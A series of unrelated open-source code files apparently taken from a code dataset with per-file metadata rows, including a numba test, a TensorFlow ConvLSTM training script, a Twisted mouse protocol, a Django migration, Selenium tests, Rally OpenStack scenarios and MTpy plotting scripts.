and isinstance(stmt.value, ir.Expr)
and stmt.value.op == 'call'):
func_def = guard(get_definition, func_ir, stmt.value.func)
if (isinstance(func_def, (ir.Global, ir.FreeVar))
and isinstance(func_def.value, CPUDispatcher)):
py_func = func_def.value.py_func
_, var_map = inline_closure_call(
func_ir, py_func.__globals__, block, i, py_func)
break
self.assertTrue('b' in var_map)
@skip_unsupported
def test_inline_call_branch_pruning(self):
# branch pruning pass should run properly in inlining to enable
# functions with type checks
@njit
def foo(A=None):
if A is None:
return 2
else:
return A
def test_impl(A=None):
return foo(A)
class InlineTestPipelinePrune(InlineTestPipeline):
def stage_inline_test_pass(self):
# assuming the function has one block with one call inside
assert len(self.func_ir.blocks) == 1
block = list(self.func_ir.blocks.values())[0]
for i, stmt in enumerate(block.body):
if (guard(find_callname, self.func_ir, stmt.value)
is not None):
inline_closure_call(self.func_ir, {}, block, i,
foo.py_func, self.typingctx,
(self.typemap[stmt.value.args[0].name],),
self.typemap, self.calltypes)
break
# make sure inline_closure_call runs in full pipeline
j_func = njit(pipeline_class=InlineTestPipelinePrune)(test_impl)
A = 3
self.assertEqual(test_impl(A), j_func(A))
self.assertEqual(test_impl(), j_func())
# make sure IR doesn't have branches
fir = j_func.overloads[(types.Omitted(None),)].metadata['final_func_ir']
fir.blocks = numba.ir_utils.simplify_CFG(fir.blocks)
self.assertEqual(len(fir.blocks), 1)
if __name__ == '__main__':
unittest.main()
| bsd-2-clause | 2,180,229,305,516,285,200 | 38.280702 | 107 | 0.579276 | false | 3.870354 | true | false | false |
polltooh/CNN_LSTM | autoencoder_clstm.py | 1 | 5975 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange
import tensorflow as tf
import utility_function as uf
# import my_seq2seq as mseq
import os
import data_queue
import nt
import time
import con_lstm as clstm
RESTORE = False
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('num_threads',2,'''the number of threads for enqueue''')
tf.app.flags.DEFINE_string('train_log_dir','auto_logs',
'''directory wherer to write event logs''')
tf.app.flags.DEFINE_integer('max_training_iter', 100000,
'''the max number of training iteration''')
tf.app.flags.DEFINE_float('init_learning_rate',0.01,
'''initial learning rate''')
tf.app.flags.DEFINE_string('model_dir', 'auto_model_logs',
'''directory where to save the model''')
# INPUT_DIM = 64 * 64
INPUT_H = 64
INPUT_W = 64
INPUT_C = 1
LABEL_C = 1
CELL_C = 4
KSIZE = 5
# LABEL_DIM = INPUT_DIM
# CELL_DIM = 1024
# CELL_LAYER = 1
BATCH_SIZE = 5
# UNROLLING_NUM = 10
UNROLLING_NUM = 10
def train():
input_data_queue = data_queue.DATA_QUEUE()
# image_name = tf.constant("lily.jpg", tf.string)
# image = uf.read_image(image_name, INPUT_H, INPUT_W)
# image_list = list()
# for _ in range(BATCH_SIZE):
# image_e = tf.expand_dims(image, 0)
# image_list.append(image_e)
# batch_image = tf.concat(0, image_list)
# batch_image = batching(image, FLAGS.batch_size)
clstm_cell = clstm.con_lstm_cell(BATCH_SIZE, INPUT_H, INPUT_W, INPUT_C, KSIZE, CELL_C)
# single_cell = tf.nn.rnn_cell.BasicLSTMCell(CELL_DIM)
# multi_cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * CELL_LAYER)
inputs_ph = list()
decodes1_ph = list()
decodes2_ph = list()
for _ in range(UNROLLING_NUM):
# inputs_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_DIM], name = "input_ph"))
# decodes1_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_DIM], name = "decodes1_ph"))
inputs_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_H,
INPUT_W, INPUT_C], name = "input_ph"))
decodes1_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_H,
INPUT_W, INPUT_C], name = "decodes1_ph"))
decodes2_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_H,
INPUT_W, INPUT_C], name = "decodes2_ph"))
# cell_initial_state = multi_cell.zero_state(BATCH_SIZE, tf.float32)
cell_initial_state = clstm_cell.get_zero_state(BATCH_SIZE, INPUT_H, INPUT_W, CELL_C, tf.float32)
# decoder_inputs_dict = dict()
# decoder_inputs_dict['reconstruction'] = decodes1_ph
# decoder_inputs_dict['prediction'] = decodes2_ph
# num_decoder_symbols_dict = dict()
# num_decoder_symbols_dict["reconstruction"] = 0
# num_decoder_symbols_dict["prediction"] = 1
# feed_previous_ph = tf.placeholder(tf.bool)
# loop_function = lambda x,y:x
def loop_function(inp, i, weights, biases):
""" loop function for decode """
output = nt._conv2d(inp, weights, biases, [1,1,1,1])
return output
# with tf.device('/gpu:%d' % 1):
_, state = clstm.clstm_encode(clstm_cell, inputs_ph, cell_initial_state)
outputs1, _ = clstm.clstm_decode([inputs_ph[-1]], state, clstm_cell, UNROLLING_NUM,
loop_function, "decoder1")
outputs2, _ = clstm.clstm_decode([inputs_ph[-1]], state, clstm_cell, UNROLLING_NUM,
loop_function, "decoder2")
# print(outputs)
con_cat_out = tf.concat(0, outputs1 + outputs2)
infer = nt.inference3(con_cat_out, KSIZE, CELL_C, LABEL_C)
con_cat_decodes = tf.concat(0, decodes1_ph + decodes2_ph)
loss = nt.loss1(infer, con_cat_decodes)
saver = tf.train.Saver()
global_step = tf.Variable(0, name = 'global_step', trainable = False)
train_op = nt.training1(loss, FLAGS.init_learning_rate, global_step = global_step)
config_proto = uf.define_graph_config(0.2)
sess = tf.Session(config = config_proto)
init_op = tf.initialize_all_variables()
sess.run(init_op)
if RESTORE:
ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)
print(ckpt.all_model_checkpoint_paths[-1])
if ckpt and ckpt.all_model_checkpoint_paths[-1]:
saver.restore(sess, ckpt.all_model_checkpoint_paths[-1])
else:
print('no check point')
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord = coord, sess = sess)
for i in xrange(FLAGS.max_training_iter):
feed_data = dict()
for j in xrange(UNROLLING_NUM):
input_v = input_data_queue.get_next_batch_train(BATCH_SIZE, False, 4)
feed_data[inputs_ph[j]] = input_v[j]
feed_data[decodes1_ph[j]] = input_v[UNROLLING_NUM - j - 1]
# batch_image_v = sess.run(batch_image)
# feed_data[inputs_ph[j]] = batch_image_v
feed_data[decodes2_ph[j]] = input_v[UNROLLING_NUM + j]
# feed_data[feed_previous_ph] = True
_, loss_v = sess.run([train_op, loss], feed_dict = feed_data)
if i % 100 == 0:
# input_v = input_data_queue.get_next_batch_test(BATCH_SIZE, False, 4)
for j in range(UNROLLING_NUM):
feed_data[inputs_ph[j]] = input_v[j]
feed_data[decodes1_ph[j]] = input_v[UNROLLING_NUM - j - 1]
feed_data[decodes2_ph[j]] = input_v[UNROLLING_NUM + j]
# feed_data[inputs_ph[j]] = batch_image_v
# feed_data[decodes1_ph[j]] = batch_image_v
# feed_data[feed_previous_ph] = True
test_loss_v, infer_v = sess.run([loss, infer], feed_dict = feed_data)
# dis_image = np.concatenate((batch_image_v[0], infer_v[0]), axis = 0)
dis_image = np.concatenate((input_v[0,-1], infer_v[0,-1]), axis = 0)
uf.display_image(dis_image)
disp = "i:%d, train loss:%f, test loss:%f"%(i, loss_v, test_loss_v)
print(disp)
if i != 0 and i % 5000 == 0:
curr_time = time.strftime("%Y%m%d_%H%M")
model_name = FLAGS.model_dir + '/' + curr_time + '_iter_' + str(i) + '_model.ckpt'
saver.save(sess,model_name)
def main(argv = None):
if not os.path.exists(FLAGS.model_dir):
os.makedirs(FLAGS.model_dir)
if not os.path.exists(FLAGS.train_log_dir):
os.makedirs(FLAGS.train_log_dir)
train()
if __name__ == '__main__':
tf.app.run()
| mit | 5,912,634,475,341,728,000 | 34.778443 | 97 | 0.669623 | false | 2.63448 | false | false | false |
glwu/python-for-android | python-modules/twisted/twisted/protocols/mice/mouseman.py | 81 | 2882 | # Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
"""Logictech MouseMan serial protocol.
http://www.softnco.demon.co.uk/SerialMouse.txt
"""
from twisted.internet import protocol
class MouseMan(protocol.Protocol):
"""
Parser for Logitech MouseMan serial mouse protocol (compatible
with Microsoft Serial Mouse).
"""
state = 'initial'
leftbutton=None
rightbutton=None
middlebutton=None
leftold=None
rightold=None
middleold=None
horiz=None
vert=None
horizold=None
vertold=None
def down_left(self):
pass
def up_left(self):
pass
def down_middle(self):
pass
def up_middle(self):
pass
def down_right(self):
pass
def up_right(self):
pass
def move(self, x, y):
pass
horiz=None
vert=None
def state_initial(self, byte):
if byte & 1<<6:
self.word1=byte
self.leftbutton = byte & 1<<5
self.rightbutton = byte & 1<<4
return 'horiz'
else:
return 'initial'
def state_horiz(self, byte):
if byte & 1<<6:
return self.state_initial(byte)
else:
x=(self.word1 & 0x03)<<6 | (byte & 0x3f)
if x>=128:
x=-256+x
self.horiz = x
return 'vert'
def state_vert(self, byte):
if byte & 1<<6:
# short packet
return self.state_initial(byte)
else:
x = (self.word1 & 0x0c)<<4 | (byte & 0x3f)
if x>=128:
x=-256+x
self.vert = x
self.snapshot()
return 'maybemiddle'
def state_maybemiddle(self, byte):
if byte & 1<<6:
self.snapshot()
return self.state_initial(byte)
else:
self.middlebutton=byte & 1<<5
self.snapshot()
return 'initial'
def snapshot(self):
if self.leftbutton and not self.leftold:
self.down_left()
self.leftold=1
if not self.leftbutton and self.leftold:
self.up_left()
self.leftold=0
if self.middlebutton and not self.middleold:
self.down_middle()
self.middleold=1
if not self.middlebutton and self.middleold:
self.up_middle()
self.middleold=0
if self.rightbutton and not self.rightold:
self.down_right()
self.rightold=1
if not self.rightbutton and self.rightold:
self.up_right()
self.rightold=0
if self.horiz or self.vert:
self.move(self.horiz, self.vert)
def dataReceived(self, data):
for c in data:
byte = ord(c)
self.state = getattr(self, 'state_'+self.state)(byte)
| apache-2.0 | 1,402,906,385,291,070,500 | 21.692913 | 66 | 0.535392 | false | 3.792105 | false | false | false |
fxdgear/beersocial | socialbeer/core/migrations/0002_auto__add_field_challenge_description.py | 1 | 4396 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Challenge.description'
db.add_column('core_challenge', 'description', self.gf('django.db.models.fields.TextField')(null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Challenge.description'
db.delete_column('core_challenge', 'description')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.challenge': {
'Meta': {'object_name': 'Challenge'},
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {})
}
}
complete_apps = ['core']
| mit | -2,602,980,566,242,846,700 | 61.8 | 182 | 0.557097 | false | 3.776632 | false | false | false |
iamgroot42/braindump | tests/test_selenium.py | 1 | 2598 | import re
import threading
import time
import unittest
from selenium import webdriver
from app import create_app, db
from app.models import User
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
# start Firefox
try:
cls.client = webdriver.Firefox()
except:
pass
# skip these tests if the browser could not be started
if cls.client:
# create the application
cls.app = create_app('testing')
cls.app_context = cls.app.app_context()
cls.app_context.push()
# suppress logging to keep unittest output clean
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel("ERROR")
# create the database and populate with some fake data
db.create_all()
User.generate_fake(10)
# add admin user
admin = User(
email='[email protected]',
username='test',
password='test',
confirmed=True)
db.session.add(admin)
db.session.commit()
# start the Flask server in a thread
threading.Thread(target=cls.app.run).start()
# give the server a second to ensure it is up
time.sleep(1)
@classmethod
def tearDownClass(cls):
if cls.client:
# stop the flask server and the browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
# destroy database
db.drop_all()
db.session.remove()
# remove application context
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('Web browser not available')
def tearDown(self):
pass
def test_home_page(self):
# navigate to home page
self.client.get('http://localhost:5000')
self.assertTrue(re.search(
'BrainDump',
self.client.page_source))
# navigate to login page
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('<h1>Login</h1>' in self.client.page_source)
# login
self.client.find_element_by_name('email').\
send_keys('[email protected]')
self.client.find_element_by_name(
'password').send_keys('test')
self.client.find_element_by_nameI('submit').click()
self.assertTrue('Log Out' in self.client.page_source)
| mit | -2,157,156,705,062,835,200 | 27.866667 | 68 | 0.565435 | false | 4.456261 | true | false | false |
yeming233/rally | rally/plugins/openstack/scenario.py | 1 | 5147 | # Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import random
from oslo_config import cfg
from osprofiler import profiler
from rally import osclients
from rally.task import scenario
configure = functools.partial(scenario.configure, platform="openstack")
CONF = cfg.CONF
class OpenStackScenario(scenario.Scenario):
"""Base class for all OpenStack scenarios."""
def __init__(self, context=None, admin_clients=None, clients=None):
super(OpenStackScenario, self).__init__(context)
if context:
api_info = {}
if "api_versions" in context.get("config", {}):
api_versions = context["config"]["api_versions"]
for service in api_versions:
api_info[service] = {
"version": api_versions[service].get("version"),
"service_type": api_versions[service].get(
"service_type")}
if admin_clients is None and "admin" in context:
self._admin_clients = osclients.Clients(
context["admin"]["credential"], api_info)
if clients is None:
if "users" in context and "user" not in context:
self._choose_user(context)
if "user" in context:
self._clients = osclients.Clients(
context["user"]["credential"], api_info)
if admin_clients:
self._admin_clients = admin_clients
if clients:
self._clients = clients
self._init_profiler(context)
def _choose_user(self, context):
"""Choose one user from users context
We are choosing on each iteration one user
"""
if context["user_choice_method"] == "random":
user = random.choice(context["users"])
tenant = context["tenants"][user["tenant_id"]]
else:
# Second and last case - 'round_robin'.
tenants_amount = len(context["tenants"])
# NOTE(amaretskiy): iteration is subtracted by `1' because it
# starts from `1' but we count from `0'
iteration = context["iteration"] - 1
tenant_index = int(iteration % tenants_amount)
tenant_id = sorted(context["tenants"].keys())[tenant_index]
tenant = context["tenants"][tenant_id]
users = context["tenants"][tenant_id]["users"]
user_index = int((iteration / tenants_amount) % len(users))
user = users[user_index]
context["user"], context["tenant"] = user, tenant
def clients(self, client_type, version=None):
"""Returns a python openstack client of the requested type.
Only one non-admin user is used per every run of scenario.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Standard python OpenStack client instance
"""
client = getattr(self._clients, client_type)
return client(version) if version is not None else client()
def admin_clients(self, client_type, version=None):
"""Returns a python admin openstack client of the requested type.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Python openstack client object
"""
client = getattr(self._admin_clients, client_type)
return client(version) if version is not None else client()
def _init_profiler(self, context):
"""Inits the profiler."""
if not CONF.benchmark.enable_profiler:
return
if context is not None:
cred = None
profiler_hmac_key = None
if context.get("admin"):
cred = context["admin"]["credential"]
if cred.profiler_hmac_key is not None:
profiler_hmac_key = cred.profiler_hmac_key
if context.get("user"):
cred = context["user"]["credential"]
if cred.profiler_hmac_key is not None:
profiler_hmac_key = cred.profiler_hmac_key
if profiler_hmac_key is None:
return
profiler.init(profiler_hmac_key)
trace_id = profiler.get().get_base_id()
self.add_output(complete={
"title": "OSProfiler Trace-ID",
"chart_plugin": "TextArea",
"data": [trace_id]})
| apache-2.0 | -7,827,861,981,665,258,000 | 37.125926 | 78 | 0.584224 | false | 4.433247 | false | false | false |
ccgeom/ccg-notes | src/ccgeom/manifold.py | 1 | 3377 |
import numpy as np
# following the idea of halfedge data structure on David Gu's lecture
# https://www3.cs.stonybrook.edu/~gu/lectures/lecture_8_halfedge_data_structure.pdf
# and adapt it to a numpy friendly representatives
# * vertexes: all position of each vertex
# * faces: all position of each centroid of faces
# * edges: all position of each centroid of edges
# * halfedges: all vectors of each halfedge
# * vertexes2vertexes
class Manifold:
def __init__(self, vtk_mesh=None):
if vtk_mesh != None:
self.mesh = vtk_mesh # a VTK mesh structure
self.n_vertexes = vtk_mesh.n_points
self.n_faces = vtk_mesh.n_cells
cells = np.array(self.mesh.cells).copy()
self.vertexes = np.array(self.mesh.points).copy()
self.faces, cells_begin, cells_end = make_dual(self.n_faces, self.vertexes, cells)
self.edges, self.halfedges = make_edges(self.n_faces, self.vertexes, cells, cells_begin, cells_end)
self.n_edges = self.edges.shape[0]
self.n_halfedges = self.halfedges.shape[0]
self.adjacency_vertexes = None
self.adjacency_faces = None
self.adjacency_edges = None
self.adjacency_halfedges = None
self.adjacency_vertexes2faces = None
self.adjacency_vertexes2edges = None
self.adjacency_vertexes2halfedges = None
self.adjacency_faces2vertexes = None
self.adjacency_faces2edges = None
self.adjacency_faces2halfedges = None
self.adjacency_edges2vertexes = None
self.adjacency_edges2faces = None
self.adjacency_edges2halfedges = None
self.adjacency_halfedges2vertexes = None
self.adjacency_halfedges2faces = None
self.adjacency_halfedges2edges = None
self.orientation = None
def __getstate__(self):
state = self.__dict__.copy()
del state["mesh"]
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.mesh = None
def make_dual(n_faces, points, faces):
ix, cur = 0, 0
centroid = []
faces_begin = []
faces_end = []
while ix < n_faces:
sz = faces[cur]
assert sz > 2
ps = points[faces[cur + 1:cur + sz]]
assert ps.shape[1] == sz
centroid.append(np.mean(ps, axis=0))
faces_begin.append(cur + 1)
faces_end.append(cur + sz)
cur = cur + sz + 1
ix += 1
assert cur == faces.shape[0]
return np.array(centroid), np.array(faces_begin), np.array(faces_end)
def make_edges(n_faces, vertexes, cells, cells_begin, cells_end):
total = 0
for ix in range(n_faces):
begin, end = cells_begin[ix], cells_end[ix]
sz = end - begin + 1
total += sz
cur = 0
edges = np.array([total, 3], dtype=np.float64)
halfedges = np.array([2 * total, 3], dtype=np.float64)
for ix in range(n_faces):
begin, end = cells_begin[ix], cells_end[ix]
sz = end - begin + 1
pxs = vertexes[cells[begin:end]]
for p in range(sz):
src, tgt = pxs[p - 1], pxs[p]
edges[cur] = (src + tgt) / 2
halfedges[2 * cur] = tgt - src
halfedges[2 * cur + 1] = src - tgt
cur += 1
return edges, halfedges | cc0-1.0 | 9,013,381,987,743,515,000 | 32.117647 | 111 | 0.588688 | false | 3.584926 | false | false | false |
bmi-forum/bmi-pyre | pythia-0.8/packages/pyre/pyre/idd/RecordLocator.py | 2 | 2248 | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from pyre.components.Component import Component
class RecordLocator(Component):
class Inventory(Component.Inventory):
import pyre.inventory
alphabet = pyre.inventory.str('alphabet', default="23456789ABCDEFGHIJKLMNPQRSTUVWXYZ")
def decode(self, locator):
locator = locator.upper()
locator = list(locator)
locator.reverse()
tid = 0
for index, letter in enumerate(locator):
tid += self._hashtable[letter] * self._base**index
label = str(tid)
return label[:-4], label[-4:]
def encode(self, transactionId, date=None):
if date is None:
import time
tick = time.localtime()
date = time.strftime("%y%m%d", tick)
bcd = int(str(transactionId) + date)
locator = self._encode(bcd)
return locator
def __init__(self):
Component.__init__(self, "locator", facility="recordLocator")
self._alphabet = None
self._base = None
self._hashtable = None
return
def _init(self):
Component._init(self)
self._alphabet = list(self.inventory.alphabet)
self._base = len(self._alphabet)
self._hashtable = self._hash(self._alphabet)
return
def _encode(self, bcd):
label = []
while 1:
bcd, remainder = divmod(bcd, self._base)
label.append(self._alphabet[remainder])
if bcd == 0:
break
label.reverse()
label = "".join(label)
return label
def _hash(self, alphabet):
hash = {}
for index, letter in enumerate(alphabet):
hash[letter] = index
return hash
# version
__id__ = "$Id: RecordLocator.py,v 1.3 2005/04/28 03:37:16 pyre Exp $"
# End of file
| gpl-2.0 | 4,583,188,842,701,710,300 | 21.039216 | 94 | 0.501335 | false | 4.331407 | false | false | false |
andimiller/twistedbot | modules/ponycountdown.py | 5 | 1786 | from datetime import datetime
def nextponies():
times = [
(datetime(2011, 11, 12, 15),2,6,"The Cutie Pox"),
(datetime(2011, 11, 19, 15),2,7,"May the Best Pet Win!"),
(datetime(2011, 11, 26, 15),2,8,"The Mysterious mare do Well"),
(datetime(2011, 12, 3, 15),2,9,"Sweet and Elite"),
(datetime(2011, 12, 10, 15),2,10,"Secret of My Excess"),
(datetime(2011, 12, 17, 15),2,11,"Hearth's Warming Eve"),
(datetime(2012, 1, 7, 15),2,12,"Family Appreciation Day"),
(datetime(2012, 1, 14, 15),2,13,"Baby Cakes"),
(datetime(2012, 1, 21, 15),2,14,"The last Roundup"),
(datetime(2012, 1, 28, 15),2,15,"The Super Speedy Cider Squeezy 6000"),
(datetime(2012, 2, 4, 15),2,16,"Read It and Weep"),
(datetime(2012, 11, 10, 15),3,1,"The Crystal Empire, Part 1"),
(datetime(2012, 11, 10, 16),3,2,"The Crystal Empire, Part 2"),
(datetime(2012, 11, 17, 15),3,3,"Too Many Pinkie Pies"),
(datetime(2012, 11, 24, 15),3,4,"One Bad Apple"),
(datetime(2012, 12, 3, 15),3,5,"Magic Duel"),
(datetime(2012, 12, 10, 15),3,6,"Sleepless in Ponyville"),
(datetime(2012, 12, 17, 15),3,7,"Wonderbolt Academy"),
(datetime(2012, 12, 24, 15),3,8,"Apple Family Reunion")
]
r=map(lambda x:(x[0]-datetime.now(),x[1],x[2],x[3]), times)
r=sorted(r)
for x in r:
if x[0].days>=0:
return "%s until Series %d episode %d - %s!" % (str(x[0]).split(".")[0], x[1], x[2], x[3])
return "OutOfPoniesException: no ponies found in the future."
def ponies(tbot, user, channel, msg):
tbot.msg(channel,nextponies())
ponies.rule = "^!ponies$"
| mit | 3,177,056,112,800,926,000 | 50.028571 | 102 | 0.537514 | false | 2.862179 | false | false | false |
MTgeophysics/mtpy | examples/cmdline/visualize_modem_models.py | 1 | 4816 | # -*- coding: utf-8 -*-
"""
Plot PTMap|RMSMap|Response|DepthSlice from Inversion Model Results
Created on Tue Oct 04 13:13:29 2016
@author: [email protected]
@author: [email protected]
Test Run:
python examples/scripts/visualize_modem_models.py ./examples/data/ModEM_files/VicSynthetic07
"""
import os
import sys
#from mtpy.imaging.modem_phase_tensor_maps import PlotPTMaps
from mtpy.modeling.modem.phase_tensor_maps import PlotPTMaps
from mtpy.imaging.plot_depth_slice import PlotDepthSlice
#from legacy.plot_response import PlotResponse
#from legacy.plot_rms_map import PlotRMSMaps
from mtpy.modeling.modem.plot_response import PlotResponse
from mtpy.modeling.modem import PlotRMSMaps
# original test case:
# datfn='ModEM_Data_noise10inv.dat' # what is this noiseinv.dat?
# NLCG_datfn='Modular_MPI_NLCG_019.dat'
# resfn='Modular_MPI_NLCG_019.res'
# rhofn='Modular_MPI_NLCG_019.rho'
# FZ: below works fine
# datfn='Isa_run3_NLCG_049.dat' #'ModEM_Data_noise10inv.dat'
# NLCG_datfn='Isa_run3_NLCG_049.dat'
# resfn='Isa_run3_NLCG_049.res'
# rhofn='Isa_run3_NLCG_049.rho'
# rename/copy the final MODEM results to these file names:
datfn='NLCG.dat' # 'ModEM_Data_noise10inv.dat'
NLCG_datfn='NLCG.dat'
resfn='NLCG.res'
rhofn='NLCG.rho'
def plot_model(data_dir, plot_type='PTMap', depth_index=20, periodin=0):
"""
plot model of the plot_type
:param data_dir: directory where modem's NLCG.dat .rho .res files are located
:param plot_type: one of these 4: PTMap|RMSMap|Response|DepthSlice
:param di:
:param periodin:
:return:
"""
wd=data_dir
plot_type=plot_type
depth_index = depth_index # depth index
# plot phase tensor map with residuals:
# this will NOT work, an empty figure.
# plt.savefig(op.join(wd,'ptmaps.png'),dpi=300,ellipse_size=40)
if plot_type == 'PTMap':
ptmObj=PlotPTMaps(data_fn=os.path.join(wd, datfn),
resp_fn=os.path.join(wd, NLCG_datfn),
ellipse_size=30)
outfn=os.path.join(wd, 'ptmaps.png')
ptmObj.plot(period=periodin, save2file=outfn)
# plot map of RMS values
# python examples/modem_plotmodel2.py
# examples/data/ModEM_files/VicSynthetic07 RMSMap
if plot_type == 'RMSMap':
resfile=os.path.join(wd, resfn)
prmsObj=PlotRMSMaps(
residual_fn=resfile,
xminorticks=50000,
yminorticks=50000)
# ,depth_index=di, save_plots='y') # these are not in func args
# prmsObj.plot_loop(fig_format="png" ) #plot all periods and save
# figure
# plot responses at a station
if plot_type == 'Response':
outfn = os.path.join(wd, 'response.png')
pltObj=PlotResponse(data_fn=os.path.join(wd, datfn),plot_type=['16-L03S01','VIC001'])
#FZ: need to refactor plot_type= list of station names
pltObj.plot()
# plot depth slice
if plot_type == 'DepthSlice':
print("plot type is", plot_type)
modrho=os.path.join(wd, rhofn)
print(modrho)
# pltObj= PlotDepthSlice(model_fn=modrho, xminorticks=100000, yminorticks=100000, depth_index=di, save_plots='y')
pltObj=PlotDepthSlice(
model_fn=modrho,
save_plots='y',
depth_index=depth_index)
pltObj.plot(ind=depth_index)
return
#########################################################################
# plot_type=[ PTMap RMSMap Response DepthSlice ]
# How2Run:
# python examples/cmdline/visualize_modem_models.py ./examples/data/ModEM_files/VicSynthetic07 PTMap pindex
#
# python examples/cmdline/visualize_modem_models.py ./examples/data/ModEM_files/VicSynthetic07
# ---------------------------------------
if __name__ == '__main__':
if len(sys.argv) <= 2:
print("USAGE example:")
print(
"python %s examples/data/ModEM_files/VicSynthetic07 [PTMap|RMSMap|Response|DepthSlice]" %
(sys.argv[0]))
for plot_type in ['PTMap', 'RMSMap', 'Response', 'DepthSlice']:
plot_model(sys.argv[1], plot_type=plot_type)
elif len(sys.argv) == 3:
data_dir=sys.argv[1]
plot_type=sys.argv[2]
if (plot_type not in ['PTMap', 'RMSMap', 'Response', 'DepthSlice']):
print("Input Parameter plot type must be in:", [
'PTMap', 'RMSMap', 'Response', 'DepthSlice'])
plot_model(data_dir, plot_type=plot_type)
else:
data_dir=sys.argv[1]
plot_type=sys.argv[2]
period_index=int(sys.argv[3])
if (plot_type not in ['PTMap', 'RMSMap', 'Response', 'DepthSlice']):
print("Input Parameter plot type must be in:", [
'PTMap', 'RMSMap', 'Response', 'DepthSlice'])
plot_model(data_dir, plot_type=plot_type, periodin=period_index)
| gpl-3.0 | -8,616,802,495,226,071,000 | 32.915493 | 121 | 0.633929 | false | 3.081254 | false | false | false |
beni55/sympy | examples/advanced/autowrap_integrators.py | 20 | 9070 | #!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in SymPy
to create fast, numerical integration routines callable from python. See
